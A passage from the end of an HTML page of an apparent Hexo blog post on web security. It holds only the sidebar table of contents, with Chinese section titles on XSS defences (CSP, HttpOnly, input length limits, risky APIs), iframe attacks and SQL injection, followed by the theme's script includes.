href="#%E7%BD%91%E9%A1%B5%E5%AE%89%E5%85%A8%E6%94%BF%E7%AD%96-CSP-Content-Security-Policy"><span class="nav-number">2.4.3.</span> <span class="nav-text">网页安全政策 CSP (Content Security Policy)</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%BC%80%E5%90%AF-HttpOnly"><span class="nav-number">2.4.4.</span> <span class="nav-text">开启 HttpOnly</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%87%87%E7%94%A8%E6%88%90%E7%86%9F%E6%B8%B2%E6%9F%93%E6%A1%86%E6%9E%B6"><span class="nav-number">2.4.5.</span> <span class="nav-text">采用成熟渲染框架</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%BF%9B%E8%A1%8C%E9%AA%8C%E8%AF%81%E7%A0%81%E9%AA%8C%E8%AF%81"><span class="nav-number">2.4.6.</span> <span class="nav-text">进行验证码验证</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%AF%B9%E4%B8%8D%E5%8F%97%E4%BF%A1%E4%BB%BB%E7%9A%84%E8%BE%93%E5%85%A5%EF%BC%8C%E9%99%90%E5%88%B6%E4%B8%80%E5%AE%9A%E7%9A%84%E9%95%BF%E5%BA%A6"><span class="nav-number">2.4.7.</span> <span class="nav-text">对不受信任的输入，限制一定的长度</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%81%BF%E5%85%8D%E4%BD%BF%E7%94%A8%E5%AE%B9%E6%98%93%E8%A2%AB-XSS-%E6%94%BB%E5%87%BB%E7%9A%84API"><span class="nav-number">2.4.8.</span> <span class="nav-text">避免使用容易被 XSS 攻击的API</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#iframe-%E6%94%BB%E5%87%BB"><span class="nav-number">3.</span> <span class="nav-text">iframe 攻击</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#SQL-%E6%B3%A8%E5%85%A5"><span class="nav-number">4.</span> <span class="nav-text">SQL 注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8F%82%E8%80%83"><span class="nav-number">5.</span> <span class="nav-text">参考</span></a></li></ol>
    </div>
</div>
        
    </aside>

    <!-- image viewer -->
    <div class="image-viewer-container">
    <div class="img-box">
        <img src="">
    </div>
</div>


</div>




<script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.0.4/source/js/utils.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.0.4/source/js/main.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.0.4/source/js/header-shrink.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.0.4/source/js/back2top.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.0.4/source/js/dark-light-toggle.js"></script>





    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.0.4/source/js/left-side-toggle.js"></script>

    
        <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.0.4/source/js/code-copy.js"></script>
    

    
        <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.0.4/source/js/libs/anime.min.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.0.4/source/js/toc.js"></script>
    


</body>
</html>